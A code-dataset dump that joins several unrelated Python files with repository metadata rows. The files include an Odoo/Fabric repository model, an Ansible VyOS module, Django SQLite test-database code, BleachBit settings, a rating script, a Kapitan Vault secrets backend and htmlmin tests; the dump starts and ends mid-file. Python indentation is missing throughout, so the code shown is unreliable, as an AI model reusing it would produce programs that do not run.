from fabric.api import cd, sudo, settings
from fabric.contrib.files import exists
import os
class server_repository(models.Model):
""""""
_name = 'it_infrastructure.server_repository'
_description = 'server_repository'
_rec_name = 'repository_id'
repository_id = fields.Many2one(
'it_infrastructure.repository',
string='Repository',
required=True
)
path = fields.Char(
string='Path'
)
server_id = fields.Many2one(
'it_infrastructure.server',
string='server_id',
ondelete='cascade',
required=True
)
@api.one
def get_repository(self):
print 'Getting repository'
self.path = self.repository_id.get_repository(self.server_id)[0]
@api.one
def update_repository(self, path=False):
print 'Updating repository'
self.server_id.get_env()
if not path:
path = self.path
if not path or not exists(path, use_sudo=True):
# raise except_orm(
# _('No Repository Folder!'),
# _("Please check that the especified path '%s' exists \
# in order to download for first time!") % path
# )
cmd = 'git clone %s %s' % (self.repository_id.url, path)
try:
# sudo(cmd, user=self.server_id.user_name, group='odoo')
sudo(cmd, user='odoo', group='odoo')
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
else:
cmd = 'git pull'
with cd(path.strip()):
try:
sudo(cmd)
except Exception, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Command output: %s') % e
)
except SystemExit, e:
raise except_orm(
_("Error executing '%s' on '%s'") % (cmd, path),
_('Unknown system error')
)
@api.one
def get_update_repository(self):
self.server_id.get_env()
if not self.path:
# Check if repository on path
path = os.path.join(
self.server_id.sources_path, self.repository_id.directory)
if exists(path, use_sudo=True):
# aparentemente ya existe el repo, intentamos actualizarlo
self.update_repository(path)
self.path = path
else:
self.get_repository()
else:
self.update_repository()
return True
| agpl-3.0 | -4,230,107,899,597,576,000 | 31.032967 | 74 | 0.50223 | false |
tdtrask/ansible | lib/ansible/modules/network/vyos/vyos_system.py | 1 | 6315 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: "vyos_system"
version_added: "2.3"
author: "Nathaniel Case (@qalthos)"
short_description: Run `set system` commands on VyOS devices
description:
- Runs one or more commands on remote devices running VyOS.
This module can also be introspected to validate key parameters before
returning successfully.
extends_documentation_fragment: vyos
notes:
- Tested against VYOS 1.1.7
options:
host_name:
description:
- Configure the device hostname parameter. This option takes an ASCII string value.
domain_name:
description:
- The new domain name to apply to the device.
name_server:
description:
- A list of name servers to use with the device. Mutually exclusive with
I(domain_search)
required: false
default: null
domain_search:
description:
- A list of domain names to search. Mutually exclusive with
I(name_server)
state:
description:
- Whether to apply (C(present)) or remove (C(absent)) the settings.
default: present
choices: ['present', 'absent']
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set system hostname vyos01
- set system domain-name foo.example.com
"""
EXAMPLES = """
- name: configure hostname and domain-name
vyos_system:
host_name: vyos01
domain_name: test.example.com
- name: remove all configuration
vyos_system:
state: absent
- name: configure name servers
vyos_system:
name_server:
- 8.8.8.8
- 8.8.4.4
- name: configure domain search suffixes
vyos_system:
domain_search:
- sub1.example.com
- sub2.example.com
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.vyos.vyos import get_config, load_config
from ansible.module_utils.network.vyos.vyos import vyos_argument_spec
def spec_key_to_device_key(key):
device_key = key.replace('_', '-')
# domain-search is longer than just it's key
if device_key == 'domain-search':
device_key += ' domain'
return device_key
def config_to_dict(module):
data = get_config(module)
config = {'domain_search': [], 'name_server': []}
for line in data.split('\n'):
if line.startswith('set system host-name'):
config['host_name'] = line[22:-1]
elif line.startswith('set system domain-name'):
config['domain_name'] = line[24:-1]
elif line.startswith('set system domain-search domain'):
config['domain_search'].append(line[33:-1])
elif line.startswith('set system name-server'):
config['name_server'].append(line[24:-1])
return config
def spec_to_commands(want, have):
commands = []
state = want.pop('state')
# state='absent' by itself has special meaning
if state == 'absent' and all(v is None for v in want.values()):
# Clear everything
for key in have:
commands.append('delete system %s' % spec_key_to_device_key(key))
for key in want:
if want[key] is None:
continue
current = have.get(key)
proposed = want[key]
device_key = spec_key_to_device_key(key)
# These keys are lists which may need to be reconciled with the device
if key in ['domain_search', 'name_server']:
if not proposed:
# Empty list was passed, delete all values
commands.append("delete system %s" % device_key)
for config in proposed:
if state == 'absent' and config in current:
commands.append("delete system %s '%s'" % (device_key, config))
elif state == 'present' and config not in current:
commands.append("set system %s '%s'" % (device_key, config))
else:
if state == 'absent' and current and proposed:
commands.append('delete system %s' % device_key)
elif state == 'present' and proposed and proposed != current:
commands.append("set system %s '%s'" % (device_key, proposed))
return commands
def map_param_to_obj(module):
return {
'host_name': module.params['host_name'],
'domain_name': module.params['domain_name'],
'domain_search': module.params['domain_search'],
'name_server': module.params['name_server'],
'state': module.params['state']
}
def main():
argument_spec = dict(
host_name=dict(type='str'),
domain_name=dict(type='str'),
domain_search=dict(type='list'),
name_server=dict(type='list', aliases=['name_servers']),
state=dict(type='str', default='present', choices=['present', 'absent']),
)
argument_spec.update(vyos_argument_spec)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[('domain_name', 'domain_search')],
)
warnings = list()
result = {'changed': False, 'warnings': warnings}
want = map_param_to_obj(module)
have = config_to_dict(module)
commands = spec_to_commands(want, have)
result['commands'] = commands
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,098,957,829,033,216,400 | 28.787736 | 89 | 0.633096 | false |
greggian/TapdIn | django/db/backends/sqlite3/creation.py | 1 | 3339 | import os
import sys
from django.conf import settings
from django.db.backends.creation import BaseDatabaseCreation
class DatabaseCreation(BaseDatabaseCreation):
# SQLite doesn't actually support most of these types, but it "does the right
# thing" given more verbose field definitions, so leave them as is so that
# schema inspection is more useful.
data_types = {
'AutoField': 'integer',
'BooleanField': 'bool',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'datetime',
'DecimalField': 'decimal',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'real',
'IntegerField': 'integer',
'IPAddressField': 'char(15)',
'NullBooleanField': 'bool',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer unsigned',
'PositiveSmallIntegerField': 'smallint unsigned',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'text',
'TimeField': 'time',
}
def sql_for_pending_references(self, model, style, pending_references):
"SQLite3 doesn't support constraints"
return []
def sql_remove_table_constraints(self, model, references_to_delete, style):
"SQLite3 doesn't support constraints"
return []
def _create_test_db(self, verbosity, autoclobber):
if settings.TEST_DATABASE_NAME and settings.TEST_DATABASE_NAME != ":memory:":
test_database_name = settings.TEST_DATABASE_NAME
# Erase the old test database
if verbosity >= 1:
print "Destroying old test database..."
if os.access(test_database_name, os.F_OK):
if not autoclobber:
confirm = raw_input("Type 'yes' if you would like to try deleting the test database '%s', or 'no' to cancel: " % test_database_name)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test database..."
os.remove(test_database_name)
except Exception, e:
sys.stderr.write("Got an error deleting the old test database: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
if verbosity >= 1:
print "Creating test database..."
else:
test_database_name = ":memory:"
return test_database_name
def _destroy_test_db(self, test_database_name, verbosity):
if test_database_name and test_database_name != ":memory:":
# Remove the SQLite database file
os.remove(test_database_name)
| apache-2.0 | -5,355,491,434,208,322,000 | 45.7 | 152 | 0.512429 | false |
FabianWe/csd-freiburg-forms | csd_freiburg_forms/donate_o_meter/donate_o_meter.py | 1 | 2011 | # Copyright (C) 2016 Fabian Wenzelmann
#
# This file is part of csd-freiburg-forms.
#
# csd-freiburg-forms is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# csd-freiburg-forms is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with csd-freiburg-forms. If not, see <http://www.gnu.org/licenses/>.
#
from PIL import Image
class DonateOMeter:
def __init__(self, background, filling, aim, box=None):
self.background = background
self.filling = filling
self.aim = aim
if box is None:
width, height = background.size
box = (0, 0, width - 1, height - 1)
self.box = box
def draw(self, current):
box = self.box
# otherwise compute the percent and crop the fill area
percent = current / self.aim
width, height = self.background.size
mh = box[3] - box[1]
ch = int(mh * percent)
# first check if ch is zero, in this case return the background
if ch <= 0:
return self.background.copy()
# check if ch is the height of the box, in this case return
# the filling
if ch >= (box[3] - box[1]):
return self.filling.copy()
img = self.background.copy()
crop_left = box[0]
crop_upper = box[3] - ch
crop_right = box[2]
crop_lower = box[3]
# crop the designated area from the image
meter_area = self.filling.crop(
(crop_left, crop_upper, crop_right, crop_lower))
img.paste(meter_area, (crop_left, crop_upper))
return img
| gpl-3.0 | -3,033,785,776,946,643,500 | 33.672414 | 79 | 0.632521 | false |
maximilianofaccone/puppy-siberian | usr/share/bleachbit/Common.py | 1 | 7633 | # vim: ts=4:sw=4:expandtab
# -*- coding: UTF-8 -*-
# BleachBit
# Copyright (C) 2014 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Code that is commonly shared throughout BleachBit
"""
import gettext
import locale
import os
import sys
if 'nt' == os.name:
from win32com.shell import shell, shellcon
APP_VERSION = "1.2"
APP_NAME = "BleachBit"
APP_URL = "http://bleachbit.sourceforge.net"
print "info: starting %s version %s" % (APP_NAME, APP_VERSION)
socket_timeout = 10
# Setting below value to false disables update notification (useful
# for packages in repositories).
online_update_notification_enabled = True
#
# Paths
#
# Windows
bleachbit_exe_path = None
if hasattr(sys, 'frozen'):
# running frozen in py2exe
bleachbit_exe_path = os.path.dirname(
unicode(sys.executable, sys.getfilesystemencoding()))
else:
# __file__ is absolute path to bleachbit/Common.py
bleachbit_exe_path = os.path.dirname(
unicode(__file__, sys.getfilesystemencoding()))
# license
license_filename = None
license_filenames = ('/usr/share/common-licenses/GPL-3', # Debian, Ubuntu
os.path.join(
bleachbit_exe_path, 'COPYING'), # Microsoft Windows
'/usr/share/doc/bleachbit-' + APP_VERSION +
'/COPYING', # CentOS, Fedora, RHEL
'/usr/share/doc/packages/bleachbit/COPYING',
# OpenSUSE 11.1
'/usr/share/doc/bleachbit/COPYING', # Mandriva
'/usr/pkg/share/doc/bleachbit/COPYING', # NetBSD 5
'/usr/share/licenses/common/GPL3/license.txt') # Arch Linux
for lf in license_filenames:
if os.path.exists(lf):
license_filename = lf
break
# configuration
portable_mode = False
options_dir = None
if 'posix' == os.name:
options_dir = os.path.expanduser("~/.config/bleachbit")
elif 'nt' == os.name:
if os.path.exists(os.path.join(bleachbit_exe_path, 'bleachbit.ini')):
# portable mode
portable_mode = True
options_dir = bleachbit_exe_path
else:
# installed mode
options_dir = os.path.expandvars("${APPDATA}\\BleachBit")
options_file = os.path.join(options_dir, "bleachbit.ini")
# personal cleaners
personal_cleaners_dir = os.path.join(options_dir, "cleaners")
# system cleaners
if sys.platform.startswith('linux'):
system_cleaners_dir = '/usr/share/bleachbit/cleaners'
elif sys.platform == 'win32':
system_cleaners_dir = os.path.join(bleachbit_exe_path, 'share\\cleaners\\')
elif sys.platform[:6] == 'netbsd':
system_cleaners_dir = '/usr/pkg/share/bleachbit/cleaners'
else:
system_cleaners_dir = None
print 'warning: unknown system cleaners directory for platform ', sys.platform
# local cleaners directory (for running from source tree)
local_cleaners_dir = os.path.normpath(
os.path.join(bleachbit_exe_path, '../cleaners'))
# application icon
__icons = ('/usr/share/pixmaps/bleachbit.png', # Linux
os.path.join(bleachbit_exe_path, 'share\\bleachbit.png'), # Windows
'/usr/pkg/share/pixmaps/bleachbit.png', # NetBSD
os.path.normpath(os.path.join(bleachbit_exe_path, '../bleachbit.png'))) # local
appicon_path = None
for __icon in __icons:
if os.path.exists(__icon):
appicon_path = __icon
# locale directory
if os.path.exists("./locale/"):
# local locale (personal)
locale_dir = os.path.abspath("./locale/")
else:
# system-wide installed locale
if sys.platform.startswith('linux'):
locale_dir = "/usr/share/locale/"
elif sys.platform == 'win32':
locale_dir = os.path.join(bleachbit_exe_path, 'share\\locale\\')
elif sys.platform[:6] == 'netbsd':
locale_dir = "/usr/pkg/share/locale/"
# launcher
launcher_path = '/usr/share/applications/bleachbit.desktop'
if 'posix' == os.name:
autostart_path = os.path.expanduser(
'~/.config/autostart/bleachbit.desktop')
#
# setup environment
#
# Windows XP doesn't define localappdata, but Windows Vista and 7 do
def environ(varname, csidl):
try:
os.environ[varname] = shell.SHGetSpecialFolderPath(None, csidl)
except:
traceback.print_exc()
msg = 'Error setting environemnt variable "%s": %s ' % (
varname, str(sys.exc_info()[1]))
import GuiBasic
GuiBasic.message_dialog(None, msg)
if 'nt' == os.name:
environ('localappdata', shellcon.CSIDL_LOCAL_APPDATA)
environ('documents', shellcon.CSIDL_DESKTOPDIRECTORY)
#
# gettext
#
try:
user_locale = locale.getdefaultlocale()[0]
except:
print 'warning: error getting locale: %s' % str(sys.exc_info()[1])
user_locale = None
if None == user_locale:
user_locale = 'C'
print "warning: No default locale found. Assuming '%s'" % user_locale
if 'win32' == sys.platform:
os.environ['LANG'] = user_locale
try:
if not os.path.exists(locale_dir):
raise RuntimeError('translations not installed')
t = gettext.translation('bleachbit', locale_dir)
_ = t.ugettext
except:
def _(msg):
"""Dummy replacement for ugettext"""
return msg
try:
ungettext = t.ungettext
except:
def ungettext(singular, plural, n):
"""Dummy replacement for Unicode, plural gettext"""
if 1 == n:
return singular
return plural
#
# pgettext
#
# Code released in the Public Domain. You can do whatever you want with this package.
# Originally written by Pierre Métras <[email protected]> for the OLPC XO laptop.
#
# Original source: http://dev.laptop.org/git/activities/clock/plain/pgettext.py
# pgettext(msgctxt, msgid) from gettext is not supported in Python implementation < v2.6.
# http://bugs.python.org/issue2504
# Meanwhile we get official support, we have to simulate it.
# See http://www.gnu.org/software/gettext/manual/gettext.html#Ambiguities for
# more information about pgettext.
# The separator between message context and message id.This value is the same as
# the one used in gettext.h, so PO files should be still valid when Python gettext
# module will include pgettext() function.
GETTEXT_CONTEXT_GLUE = "\004"
def pgettext(msgctxt, msgid):
"""A custom implementation of GNU pgettext().
"""
if msgctxt is not None and msgctxt is not "":
translation = _(msgctxt + GETTEXT_CONTEXT_GLUE + msgid)
if translation.startswith(msgctxt + GETTEXT_CONTEXT_GLUE):
return msgid
else:
return translation
else:
return _(msgid)
# Map our pgettext() custom function to _p()
_p = lambda msgctxt, msgid: pgettext(msgctxt, msgid)
#
# URLs
#
base_url = "http://bleachbit.sourceforge.net"
help_contents_url = "%s/link.php?version=%s&lang=%s&target=help" \
% (base_url, APP_VERSION, user_locale)
release_notes_url = "%s/link.php?version=%s&lang=%s&target=release_notes" \
% (base_url, APP_VERSION, user_locale)
update_check_url = "%s/communicate.php" % base_url
| gpl-3.0 | 3,201,493,757,747,861,000 | 29.898785 | 91 | 0.666798 | false |
lucabaldini/rating02 | dump_rating.py | 1 | 7983 | #!/usr/bin/env python
#
# Copyright (C) 2019, Luca Baldini.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import numpy
import matplotlib.pyplot as plt
from rating import *
import _rating2020 as _rating
def filter_db_pers(db_pers):
"""This is filtering a DocentDatabse object removing all the persons with
less than 2 products (which automatically get 0 rating points).
Note that, for the thing to work, this has to be called after a loop
over the db where the product statistics has been calculated and
updated.
"""
db = DocentDatabase()
for pers in db_pers:
if pers.num_products >= 2:
db.append(pers)
else:
print('Filtering out %s (%d products)...' %\
(pers.full_name, pers.num_products))
return db
def dump_rating(file_path, collab_threshold=30):
"""Dump the full rating information.
"""
# Load the underlying database objects.
db_prod = load_db_prod()
db_pers = load_db_pers()
sub_areas = sorted(Product.SUB_AREA_DICT.keys())
# First loop over the products, where we mark the invalid as such, and
# we manually set the journal impact factor where necessary.
print('Post-processing product list...')
for prod in db_prod:
# Mark invalids.
if prod.row_index in _rating.INVALID:
print('Marking product @ row %d for %s as invalid...' %\
(prod.row_index, prod.author_surname))
prod.valid = False
# Set impact factor if necessary.
if prod.pub_type == '1.1 Articolo in rivista' and \
prod.impact_factor() is None and \
prod.journal in _rating.IMPACT_FACTOR_DICT.keys():
journal = prod.journal
impact_factor = _rating.IMPACT_FACTOR_DICT[journal]
print('Setting IF for %s @ row %d to %.3f...' %\
(journal, prod.row_index, impact_factor))
prod.set_impact_factor(impact_factor)
# Break out the docent database into the three sub-areas.
# Mind at this points the sub-lists still contain the persons with less
# than 2 products.
print('Populating sub-areas...')
pers_dict = {}
for sub_area in sub_areas:
pers_dict[sub_area] = db_pers.select(sub_area=sub_area)
# Actual loop to calculate the rating points and the basic product
# statistics for all the docents.
print('Calculating rating points...')
for sub_area in sub_areas:
for pers in pers_dict[sub_area]:
prods = db_prod.select(author_full_name=pers.full_name, valid=True)
pers.num_products = len(prods)
if len(prods) == 0:
continue
rating = sum(prod.rating_points(sub_area, _rating.RATING_DICT) for\
prod in prods)
# Take any leave of absence into account.
if pers.full_name in _rating.LOA_SCALING_DICT:
scale = _rating.LOA_SCALING_DICT[pers.full_name]
print('Scaling rating for %s by %.3f' % (pers.full_name, scale))
rating *= scale
num_authors = numpy.array([prod.num_authors for prod in prods])
# Update the Docent object.
pers.rating = rating
# Note that we're casting all the numpy scalars to native Python
# types for the excel interface module to be able to write them in
# the output file.
pers.num_collab_products = \
int((num_authors > collab_threshold).sum())
pers.min_num_authors = int(num_authors.min())
pers.median_num_authors = float(numpy.median(num_authors))
pers.max_num_authors = int(num_authors.max())
# Now that we have the basic product statistics we can filter out
# the docents with less than 2 products.
for sub_area in sub_areas:
print('Filtering docent databse for sub-area %s...' % sub_area)
pers_dict[sub_area] = filter_db_pers(pers_dict[sub_area])
# Sort the docents and dump the excel file.
print('Sorting docents within sub-areas...')
table = ExcelTableDump()
col_names = ['Ranking', 'Nome', 'Punti rating', 'Numero prodotti',
'Numero prodotti con > %d autori' % collab_threshold,
'# autori min', '# autori medio', '# autori max']
for sub_area in sub_areas:
rows = []
pers_dict[sub_area].sort(reverse=True)
print('Ratings points for sub-area %s:' % sub_area)
for i, pers in enumerate(pers_dict[sub_area]):
pers.ranking = i
print('%2i -- %s: %f rating points.' %\
(i, pers.full_name, pers.rating))
rows.append([i, pers.full_name, pers.rating, pers.num_products,
pers.num_collab_products, pers.min_num_authors,
pers.median_num_authors, pers.max_num_authors])
table.add_worksheet('Sottoarea %s' % sub_area, col_names, rows)
table.write(file_path)
# Do some plotting.
for sub_area in sub_areas:
plt.figure('Sottoarea %s' % sub_area, figsize=(12, 8))
num_persons = len(pers_dict[sub_area])
num_points = _rating.RATING_POINTS_PER_DOCENT * num_persons
plt.title('Sottoarea %s (%d docenti, %.3f punti)' %\
(sub_area, num_persons, num_points), size=18)
ranking = numpy.array([pers.ranking for pers in pers_dict[sub_area]])
rating = numpy.array([pers.rating for pers in pers_dict[sub_area]])
plt.plot(ranking, rating, 'o')
plt.xlabel('Ranking')
plt.ylabel('Rating points')
for pers in pers_dict[sub_area]:
x = pers.ranking
y = pers.rating
name = pers.full_name.split()[0].title()
if name in ['Di', 'Del', 'Prada']:
name += ' %s' % pers.full_name.split()[1].title()
txt = '%s, %d (%d) <%.1f>' %\
(name, pers.num_products, pers.num_collab_products,
pers.median_num_authors)
plt.text(x, y, txt, rotation=20., ha='left', va='bottom')
leg = 'Cognome, # prod (# prod > %d auth) <median # auth>' %\
(collab_threshold)
plt.text(0.5, 0.9, leg, transform=plt.gca().transAxes, size=12)
# Calculate the quantiles.
print('Calculating quantiles for sub-area %s...' % sub_area)
quantiles = numpy.floor(numpy.linspace(0.22, 0.75, 3) * num_persons)
quantiles += 0.5
for q in quantiles:
plt.axvline(q, ls='dashed')
quantiles = numpy.concatenate(([-0.5], quantiles, [num_persons + 0.5]))
psum = 0
for i, (q1, q2) in enumerate(zip(quantiles[:-1], quantiles[1:])):
mask = (ranking > q1) * (ranking < q2)
r = ranking[mask]
n = len(r)
frac = float(n) / num_persons
p = 4 - i
psum += p * n
print('%d docents with %d points...' % (n, p))
plt.text(r.mean(), 2, '%d x %d = %d (%.1f %%)' %\
(p, n, n * p, 100. * frac), ha='center')
print('Total rating points for area %s: %d' % (sub_area, psum))
plt.savefig('rating02_2020_%s.png' % sub_area)
plt.show()
if __name__ == '__main__':
dump_rating('rating02_2020.xls')
| gpl-3.0 | 4,332,046,184,173,600,300 | 41.68984 | 80 | 0.591131 | false |
ademariag/kapitan | kapitan/refs/secrets/vaultkv.py | 2 | 9041 | # Copyright 2019 The Kapitan Authors
# SPDX-FileCopyrightText: 2020 The Kapitan Authors <[email protected]>
#
# SPDX-License-Identifier: Apache-2.0
"hashicorp vault kv secrets module"
import base64
import logging
import os
from binascii import Error as b_error
from sys import exit
from kapitan import cached
from kapitan.errors import KapitanError
from kapitan.refs.base import RefError
from kapitan.refs.base64 import Base64Ref, Base64RefBackend
import hvac
from hvac.exceptions import Forbidden, InvalidPath
logger = logging.getLogger(__name__)
class VaultError(KapitanError):
"""Generic vault errors"""
pass
def get_env(parameter):
"""
The following variables need to be exported to the environment or defined in inventory.
* VAULT_ADDR: url for vault
* VAULT_SKIP_VERIFY=true: if set, do not verify presented TLS certificate before communicating with Vault server.
* VAULT_CLIENT_KEY: path to an unencrypted PEM-encoded private key matching the client certificate
* VAULT_CLIENT_CERT: path to a PEM-encoded client certificate for TLS authentication to the Vault server
* VAULT_CACERT: path to a PEM-encoded CA cert file to use to verify the Vault server TLS certificate
* VAULT_CAPATH: path to a directory of PEM-encoded CA cert files to verify the Vault server TLS certificate
* VAULT_NAMESPACE: specify the Vault Namespace, if you have one
Following keys are used to creates a new hvac client instance.
:param url: Base URL for the Vault instance being addressed.
:type url: str
:param cert: Certificates for use in requests sent to the Vault instance. This should be a tuple with the
certificate and then key.
:type cert: tuple
:param verify: Either a boolean to indicate whether TLS verification should be performed when sending requests to Vault,
or a string pointing at the CA bundle to use for verification.
See http://docs.python-requests.org/en/master/user/advanced/#ssl-cert-verification.
:type verify: Union[bool,str]
:param namespace: Optional Vault Namespace.
:type namespace: str
"""
client_parameters = {}
client_parameters["url"] = parameter.get("VAULT_ADDR", os.getenv("VAULT_ADDR", default=""))
client_parameters["namespace"] = parameter.get(
"VAULT_NAMESPACE", os.getenv("VAULT_NAMESPACE", default="")
)
# VERIFY VAULT SERVER TLS CERTIFICATE
skip_verify = str(parameter.get("VAULT_SKIP_VERIFY", os.getenv("VAULT_SKIP_VERIFY", default="")))
if skip_verify.lower() == "false":
cert = parameter.get("VAULT_CACERT", os.getenv("VAULT_CACERT", default=""))
if not cert:
cert_path = parameter.get("VAULT_CAPATH", os.getenv("VAULT_CAPATH", default=""))
if not cert_path:
raise Exception("Neither VAULT_CACERT nor VAULT_CAPATH specified")
client_parameters["verify"] = cert_path
else:
client_parameters["verify"] = cert
else:
client_parameters["verify"] = False
# CLIENT CERTIFICATE FOR TLS AUTHENTICATION
client_key = parameter.get("VAULT_CLIENT_KEY", os.getenv("VAULT_CLIENT_KEY", default=""))
client_cert = parameter.get("VAULT_CLIENT_CERT", os.getenv("VAULT_CLIENT_CERT", default=""))
if client_key != "" and client_cert != "":
client_parameters["cert"] = (client_cert, client_key)
return client_parameters
def vault_obj(vault_parameters):
"""
vault_parameters: necessary parameters to authenticate & get value from vault, provided by inventory
e.g.:
auth: userpass
VAULT_ADDR: http://127.0.0.1:8200
VAULT_SKIP_VERIFY: false
Authenticate client to server and return client object
"""
env = get_env(vault_parameters)
client = hvac.Client(**{k: v for k, v in env.items() if k != "auth"})
auth_type = vault_parameters["auth"]
# GET TOKEN EITHER FROM ENVIRONMENT OF FILE
if auth_type in ["token", "github"]:
env["token"] = os.getenv("VAULT_TOKEN")
if not env["token"]:
try:
token_file = os.path.join(os.path.expanduser("~"), ".vault-token")
with open(token_file, "r") as f:
env["token"] = f.read()
if env["token"] == "":
raise VaultError("{file} is empty".format(file=token_file))
except IOError:
raise VaultError("Cannot read file {file}".format(file=token_file))
# DIFFERENT LOGIN METHOD BASED ON AUTHENTICATION TYPE
if auth_type == "token":
client.token = env["token"]
elif auth_type == "ldap":
client.auth.ldap.login(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "userpass":
client.auth_userpass(username=os.getenv("VAULT_USERNAME"), password=os.getenv("VAULT_PASSWORD"))
elif auth_type == "approle":
client.auth_approle(os.getenv("VAULT_ROLE_ID"), secret_id=os.getenv("VAULT_SECRET_ID"))
elif auth_type == "github":
client.auth.github.login(token=env["token"])
else:
raise "Authentication type '{auth}' not supported".format(auth=auth_type)
if client.is_authenticated():
return client
else:
raise VaultError("Vault Authentication Error, Environment Variables defined?")
class VaultSecret(Base64Ref):
"""
Hashicorp Vault support for KV Secret Engine
"""
def __init__(self, data, vault_params, **kwargs):
"""
Set vault parameter and encoding of data
"""
self.data = data
self.vault_params = vault_params
super().__init__(self.data, **kwargs)
self.type_name = "vaultkv"
@classmethod
def from_params(cls, data, ref_params):
"""
Return new VaultSecret from data and ref_params: target_name
parameters will be grabbed from the inventory via target_name
"""
try:
target_name = ref_params.kwargs["target_name"]
if target_name is None:
raise ValueError("target_name not set")
target_inv = cached.inv["nodes"].get(target_name, None)
if target_inv is None:
raise ValueError("target_inv not set")
ref_params.kwargs["vault_params"] = target_inv["parameters"]["kapitan"]["secrets"]["vaultkv"]
return cls(data, **ref_params.kwargs)
except KeyError:
raise RefError("Could not create VaultSecret: vaultkv parameters missing")
@classmethod
def from_path(cls, ref_full_path, **kwargs):
return super().from_path(ref_full_path, encrypt=False, **kwargs)
def reveal(self):
"""
Returns decrypted data
"""
# can't use super().reveal() as we want bytes
try:
self.data = base64.b64decode(self.data, validate=True)
except b_error:
exit("non-alphabet characters in the data")
return self._decrypt()
def _decrypt(self):
"""
Authenticate with Vault server & returns value of the key from secret
:returns: secret in plain text
"""
try:
client = vault_obj(self.vault_params)
# token will comprise of two parts path_in_vault:key
data = self.data.decode("utf-8").rstrip().split(":")
return_data = ""
if self.vault_params.get("engine") == "kv":
response = client.secrets.kv.v1.read_secret(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"][data[1]]
else:
response = client.secrets.kv.v2.read_secret_version(
path=data[0], mount_point=self.vault_params.get("mount", "secret")
)
return_data = response["data"]["data"][data[1]]
client.adapter.close()
except Forbidden:
raise VaultError(
"Permission Denied. "
+ "make sure the token is authorised to access {path} on Vault".format(path=data[0])
)
except InvalidPath:
raise VaultError("{path} does not exist on Vault secret".format(path=data[0]))
if return_data == "":
raise VaultError("'{key}' doesn't exist on '{path}'".format(key=data[1], path=data[0]))
return return_data
def dump(self):
"""
Returns dict with keys/values to be serialised.
"""
return {
"data": self.data,
"encoding": self.encoding,
"type": self.type_name,
"vault_params": self.vault_params,
}
class VaultBackend(Base64RefBackend):
def __init__(self, path, ref_type=VaultSecret, **ref_kwargs):
"init VaultBackend ref backend type"
super().__init__(path, ref_type, **ref_kwargs)
self.type_name = "vaultkv"
| apache-2.0 | 3,772,391,026,941,438,000 | 38.480349 | 128 | 0.619843 | false |
Zowie/django-htmlmin | htmlmin/tests/test_minify.py | 1 | 7473 | # -*- coding: utf-8 -*-
# Copyright 2013 django-htmlmin authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import six
import codecs
import unittest
from htmlmin.minify import html_minify
from os.path import abspath, dirname, join
resources_path = lambda *paths: abspath(join(dirname(__file__),
'resources', *paths))
class TestMinify(unittest.TestCase):
def _normal_and_minified(self, filename):
html_file = resources_path('%s.html' % filename)
html_file_minified = resources_path('%s_minified.html' % filename)
html = open(html_file).read()
f_minified = codecs.open(html_file_minified, encoding='utf-8')
return html, f_minified.read().strip('\n')
def test_complete_html_should_be_minified(self):
html, minified = self._normal_and_minified('with_menu')
self.assertEqual(minified, html_minify(html))
def test_html_with_blank_lines_should_be_minify(self):
html, minified = self._normal_and_minified('with_blank_lines')
self.assertEqual(minified, html_minify(html))
def test_should_not_minify_content_from_script_tag(self):
html, minified = self._normal_and_minified('with_javascript')
